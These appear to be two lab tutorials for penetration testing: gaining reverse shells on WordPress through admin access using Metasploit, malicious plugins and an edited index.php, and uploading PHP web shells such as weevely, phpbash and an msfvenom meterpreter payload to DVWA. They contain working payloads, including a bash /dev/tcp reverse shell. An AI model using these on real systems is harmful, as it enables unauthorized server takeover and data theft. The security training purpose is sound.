WordPress: Reverse Shell

This post focuses on WordPress security testing to explore the procedures for exploiting WordPress by compromising the admin console. We have already set up WordPress on our local machine, but if you want to learn about WordPress installation and configuration, please visit the link below:

 

WordPress Lab Setup in Ubuntu

 

As we know, WPScan is a standalone tool for identifying vulnerable plugins and themes in WordPress. However, this post will not cover a WPScan tutorial.

 

Table of Content

 

●       Metasploit Framework

●       Injecting Malicious code

●       Inject Malicious Plugin

●       Inject custom Malicious Plugin

●       WetW0rk - Malicious WordPress Plugin

Requirement:

Host machine: WordPress

Attacker machine: Kali Linux

WordPress Credential: raj: 123 (in our case)

Let’s begin!!

As you can see, I have access to the WordPress admin console via the web browser. To obtain a web shell, we need to exploit this CMS. There are multiple methods to exploit WordPress; let's explore some of these operations.

Exploiting using Metasploit Framework

The first method involves using the Metasploit framework. This module requires an administrator username and password, logs into the admin panel, and uploads a payload packaged as a WordPress plugin. Because this is an authenticated code execution by design, it should work on all versions of WordPress, resulting in a Meterpreter session to the webserver.

msf > use exploit/unix/webapp/wp_admin_shell_upload

msf exploit(wp_admin_shell_upload) > set USERNAME admin

msf exploit(wp_admin_shell_upload) > set PASSWORD admin

msf exploit(wp_admin_shell_upload) > set targeturi /wordpress

msf exploit(wp_admin_shell_upload) > exploit

 

Great! It works perfectly, and as you can see, we have successfully obtained a reverse connection to the web server via a Meterpreter session.

Injecting Malicious code into the wp framework

Another technique to spawn web server shells involves injecting malicious code. If you have an administrator's username and password, log in to the admin panel and inject malicious PHP code into the index.php file, which is the entry point of the website.

To do this, navigate to the WordPress dashboard, click on "Plugins" in the left-hand menu, and then click "Add New."

In the search bar, type "Advanced File Manager" and locate the plugin by "modalweb."

Install and Activate the Plugin:

Click "Install Now" and then "Activate" to enable the plugin on your WordPress site.

 

Once activated, go to the "File Manager" option in the left-hand menu.

 

Use the file manager to navigate the file system of your WordPress installation. This interface allows you to view, upload, and edit files directly.

 

In WordPress, right-click on index.php and select "Edit." Before making any changes, create a duplicate of the file so that you can restore it later if needed.

 

 

On kali, open and copy the code from /usr/share/webshells/php/php-reverse-shell.php

 

 

Paste the following code into the index.php file, updating the IP address with your Kali machine's IP and the port number. Then click the 'Save and Close' button.

 

Next, open a terminal on your Kali machine and start Netcat:

 

rlwrap nc -lvnp 1234

 

 

Try accessing the wordpress page in another browser tab which should get us the reverse shell.

 

Inject a Malicious Plugin

Sometimes, logged-on users may not have the necessary write permissions to modify the WordPress theme. In such cases, injecting a malicious WP plugin is an alternative strategy for acquiring a web shell.

Once you have access to the WordPress dashboard, you can attempt to install a malicious plugin. In this example, I have already downloaded a vulnerable plugin from Exploit DB.

Click here to download the plugin for practice.

 

Now that we have the ZIP file for the plugin, it's time to upload it.

 

Dashboard > plugins > upload plugin

 

In the "Plugins" menu, click "Add New" and then "Upload Plugin". Choose your malicious plugin ZIP file and click "Install Now".

 

After uploading, click "Activate" to enable the plugin.

 

Once everything is properly set up, you can proceed with exploitation. We have installed a vulnerable plugin called "reflex-gallery," which is known to be easily exploitable.

To exploit this vulnerability, you can use the Metasploit framework. Load the following module and execute the provided command:

 

use exploit/unix/webapp/wp_reflexgallery_file_upload

set rhosts 192.168.31.205

set targeturi /wordpress

exploit

 

After executing the above commands, you will establish a Meterpreter session. As demonstrated in this article, there are various methods to exploit a website built on the WordPress platform.

Inject custom Malicious Plugin

As demonstrated earlier, we uploaded a vulnerable plugin with a readily available exploit. This time, we will inject our custom-generated malicious plugin to obtain a reverse shell. The process is straightforward: we have saved the reverse shell's malicious code in a PHP file named "revshell.php" and compressed it into a ZIP file.

exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'")

 

 

Repeat the previous steps to upload the "revshell.zip" plugin file, then start a Netcat listener to establish a reverse connection to the target machine.

 

 

Once the package gets installed successfully, we need to activate the plugin.

 

As soon as you activate the plugin, it will establish a reverse connection, creating a Netcat session.

 

 

WetW0rk - Malicious WordPress plugin

 

First, we need to download the malicious WordPress plugin from GitHub. This plugin contains the code necessary to exploit the WordPress installation.

 

Open a terminal on your Kali Linux machine and use the following command to clone the repository:

 

git clone https://github.com/wetw0rk/malicious-wordpress-plugin

 

Change to the directory containing the cloned repository.

 

Next, we need to generate the malicious plugin that will be uploaded to the WordPress site to exploit it.

 

Use the wordpwn.py script from the cloned repository to generate the plugin. Replace <Kali_IP> with your Kali machine's IP address and 8888 with the desired port number:

 

python wordpwn.py <Kali_IP> 8888 Y

After running the script, make a note of the URLs provided for triggering the reverse shell. These URLs will be used later to establish the connection.

 

http://(target)/wp-content/plugins/malicious/wetw0rk_maybe.php

http://(target)/wp-content/plugins/malicious/QwertyRocks.php

http://(target)/wp-content/plugins/malicious/SWebTheme.php?cmd=ls

 

This script also starts metasploit framework as part of the process and would be waiting for the reverse shell.

 

 

Now that we have generated the malicious plugin, we can proceed with uploading it to the WordPress site to exploit it.

 

Upload the plugin as we did earlier.

 

 

 

 

Web Shells Penetration Testing

This post will describe the various PHP web Shell uploading technique to take unauthorized access of the web server by injecting malicious piece of code that are written in PHP.

Table of content

• Introduction of PHP Web shells
• Inbuilt Kali’s web shells
• simple backdoor.php
• qsd-php backdoor web shell
• php-reverse-shell.php
• Using MSF venom
• Weevely php web shell
• Php_bash web shell

Requirements

Attacker: Kali Linux

Target: Web for Pentester, DVWA

Introduction of PHP Web Shells

Web shells are the scripts which are coded in many languages like PHP, Python, ASP, Perl and so on which further use as backdoor for illegitimate access in any server by uploading it on a web server.

The attacker can then directly perform the read and write operation once the backdoor is uploaded to a destination, you can edit any file of delete the server file. Today we are going to explore all kinds of php web shells what-so-ever are available in kali Linux and so on. So, let’s get started.

Kali Linux has inbuilt PHP Scripts for utilizing them as backdoor to assist Pen-testing work. They are stored inside /usr/share/webshells/php and a pen-tester can directory make use of them without wasting time in writing PHP code for malicious script.

·        simple backdoor.php

·        qsd-php backdoor web shell

·        php-reverse-shell.php

Simplebackdoor.php shell

Simple-backdoor.php is a kind of web shell that can generate a remote code execution once injected in the web server and script made by “John Troon”. It is already accessible in Kali in the/usr/share/web shells/php folder as shown in the pic below and after that we will run ls -al command to check the permissions given to the files.

cd /usr/share/webshells/php

ls -al

Now you must discover a way to upload a shell in your application. As we have doing all this Web for Pentesters, so we will first try to upload here simple backdoor php shell which is already available in kali and click on send file to upload the shell.

As you can see, we have successfully uploaded the malicious php file and received the hyperlink for uploaded file.

Thus, we try to access simple-backdoor.php and obtain following output. As we can observe that here “cmd=cat+/etc/passwd” is a clear indication for Remote code execution.

So, let’s try and run cat+/etc/passwd to retrieve all the passwords of the server.

cmd=cat+/etc/passwd

As result we have extracted all records of passwd file, hence we can execute any command such as ls, cp and so on therefore we can obtain web shell by exploiting REC.

qsd-php backdoor shell

An exploit of a web shell generally considered as backdoor that enables an attacker to access and control a server remotely and qsd-php backdoor shell is a kind of backdoor which provide a platform for executing system command and the wonderful script made by “Daniel Berliner”.

As you can see, we have uploaded the qsd-php-backdoor.php file successfully.

Then try accessing qsd-php-backdoor.php as you did in the previous step and you will find something as shown in the image below. Here you can perform directory traversal and you can also access the Web Server directory directly by entering the command and clicking on the go button.

As you can observe we have accessed the current directory directly without executing any system command.

We can also execute arbitrary system command since this backdoor provides a platform to execute shell command such cat/etc/passwd, ls -al and much more. We can also run two commands simultaneously and see the result.

As you can see that we have got the result successfully.

Php-reverse shell

Now its turn to move towards our next php web shell which is php-reverse-shell.php which will open an outbound TCP connection from the webserver to a host and script made by “pentestmonkey”. A shell will be attached to the TCP connection (reverse TCP connection). You can run interactive programs such as telnet, ssh etc with this script. It is different from the other Web shells script, through which you can send a single command and then return the output.

For this we need to open this script through nano

nano php-reverse-shell.php

Here we need to give the LISTEN_IP (Kali Linux) where we want the connection and LISTEN_PORT number can be set any.

 Now we need to upload this web shell in order to get the reverse connection. So, we will upload the malicious file and on other hand start netcat listener inside a new terminal.

We can see that it is uploaded successfully.

Now as soon as you will execute the uploaded file and If all went well, then, the web server should have thrown back a reverse shell to your netcat listener. And you can verify that we have got the shell successfully.

PHP Backdoor using MSFvenom 

We can also generate a php web shell with the help of msfvenom. We, therefore, write use msfvenom following command for generating malicious php code in raw format.

msfveom -p php/meterpreter/reverse_tcp lhost=192.168.1.106 lport=4444 R

Then copy the code and save it by the name of meter.php

Now we will upload this malicious shell in DVWA lab to get the reverse connection. Now you can see the "meter.php successfully uploaded" message from the screenshot, meaning that our php backdoor is effectively uploaded.

In order to execute the shell, the we will open the URL of DVWA.

Simultaneously we will start multi handler where we will get the meterpreter shell and we will run the following commands where we need to specify the lhost and lport to get the reverse connection.

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.1.106

set lport 4444

exploit

sysinfo

As soon as you will explore the uploaded path and execute the backdoor, it will give you a meterpreter session.

Weevely Shell

Weevely is a stealthy PHP internet shell which simulates the link to Telnet and is designed for remote server administration and penetration testing. It can be used as a stealth backdoor a web shell to manage legit web accounts, it is an essential tool for web application post exploitation. We can generate a PHP backdoor protected with the password.

Open the terminal and type weevely to generate a php backdoor and also set a password as in our case we have taken “raj123” and save this web shell as weevely.php

weevely generate raj123 weevely.php

Now upload this web shell at the target location as in our case we have uploaded it at Web for pen testers and we will open the URL in the browse to execute the web shell.

Type the following instruction to initiate the web server attack and put a copied URL into the Weevely command using password raj123 and you can see that we have got the victim shell through weevely. We can verify this by id command.

weevely http://192.168.1.104/upload/images/weevely.php raj123

id

You can also check all the functionality of weevely through help command.

PHPbash shell

Phpbash is an internet shell that is autonomous, semi-interactive. We are going to download it from GitHub and then we will go inside the directory phpbash and execute ls -al command to check the available files.

git clone https://github.com/Arrexel/phpbash.git

cd phpbash/

ls -al

So inside phpbash, we found a php script named “phpbash.php”, upload this script at your target location.

Now we will upload this web shell in DVWA lab and we can see the message that it is uploaded successfully.

Going ahead; we will open the URL to execute the shell.

Here our phpbash malicious file is executed and given the web shell. The benefit of the phpbash is that it doesn’t required any type of listener such as netcat because it has inbuilt bash shell that you can observe from the given image.

As result we have bash shell of www-data and we can execute system command directly through this platform.

So, this way we have explored and performed numerous ways to get the web shell through php web shells; which you can find under this single article.